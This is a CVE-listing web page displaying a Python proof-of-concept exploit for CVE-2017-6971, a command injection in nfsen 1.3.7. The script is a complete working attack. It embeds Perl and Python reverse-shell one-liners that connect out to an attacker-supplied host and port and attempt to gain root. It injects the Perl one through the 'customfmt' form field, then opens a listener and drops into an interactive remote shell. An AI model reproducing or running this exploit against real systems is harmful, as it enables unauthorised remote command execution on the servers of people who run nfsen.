4837 Total CVEs
26 Years
GitHub
Home / 2017 / CVE-2017-6971
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
from __future__ import print_function
# remove above import if on python3

import requests
import socket
import base64

from time import sleep
from sys import argv

# Exploit for CVE-2017-6971 command injection in nfsen 1.3.7
# Tested on Ubuntu, probably works on everything
# Vulnerability discovered by Paul Taylor/Foregenix Ltd
# Usage: python exploit.py <local ip> <local port> <target ip> <path>

if len(argv) < 5:
    print("Usage: python exploit.py <local ip> <local port> <target ip> <path>")
    exit(1)

# local ip, port to receive shell on
LHOST=argv[1]
LPORT=argv[2]

# target ip
RHOST=argv[3]

# path to nfsen (e.g. 'nfsen' if located at http://target.com/nfsen/nfsen.php)
PATH=argv[4]

url = "http://" + RHOST + '/' +  PATH + "/nfsen.php?tab=2"

# Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
python_command="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + LPORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.setuid(0); os.setgid(0); p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

# If this fails, try the python one.
perl_command = "perl -e 'use Socket;use English; $i=\"" + LHOST + "\";$p=" + LPORT + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");$EUID=0;$GID=0;exec(\"/bin/sh -i\");};'"

# basic command injection
payload = "';" + perl_command + "; '#"

# may need to change the srcselector to match specific target
data = {
    'srcselector%5B%5D': 'peer1',
    'filter': '',
    'filter_name': 'none',
    'modeselect': '0',
    'listN': '0',
    'topN': '0',
    'statype': '1',
    'output': 'custom ...',
    'customfmt': payload,
    'process': 'process'
}

s = requests.Session()

# these required for initializing session and navigating to details page
s.get(url)
s.get(url)

# setup listener
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LHOST, int(LPORT)))
sock.listen(1)

# send payload
try:
    s.post(url, data=data, timeout=0.1)
except:
    pass

# get shell
connection, remote_address = sock.accept()
print("Received connection from " + str(remote_address[0]))

connection.setblocking(0)
print(connection.recv(1024), end='')

while True:
    cmd = raw_input()
    connection.sendall(cmd + '\n')
        
    sleep(0.1)
    try:
        chunk = None
        while chunk != "":
            chunk = connection.recv(1024)
            print(chunk, end='')
    except:
        pass

connection.close()
sock.close()